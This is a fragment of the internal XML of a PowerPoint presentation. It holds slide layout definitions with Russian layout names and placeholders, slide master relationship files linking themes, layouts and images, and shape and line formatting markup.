            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="86"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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32">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="87"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1B1BBF9C-EE71-4350-A2E6-FE7BEBFAC275}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="88"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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8_">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="89"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{A64D99C3-5A73-40BE-AC1C-5ECBDEB286A7}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="90"/>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Заголовок раздела">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D5FF4672-7806-4739-8701-17FFB770C3B0}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>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Два объекта">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47"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8"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sldNum" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{C0322553-FEBA-4772-AD30-BA18045EA4FF}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="12"/>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Сравнение">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{46D2030B-160C-4FBF-BEC7-DAE11315AC91}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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Только заголовок">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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7F33B319-23DC-41C2-8FEF-4E76363C6479}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="16"/>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Пустой слайд">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{81CD95C1-B034-4B11-868D-614C604A2187}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="18"/>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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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image" Target="../media/image1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.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slideLayout" Target="../slideLayouts/slideLayout2.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image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout29.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster30.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout31.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout34.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout37.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster40.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout40.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout43.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout44.xml"/>
</Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout45.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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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1" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{911C7228-0413-463C-9A3C-C7D9A23CADE0}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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3"/>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9" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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70" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
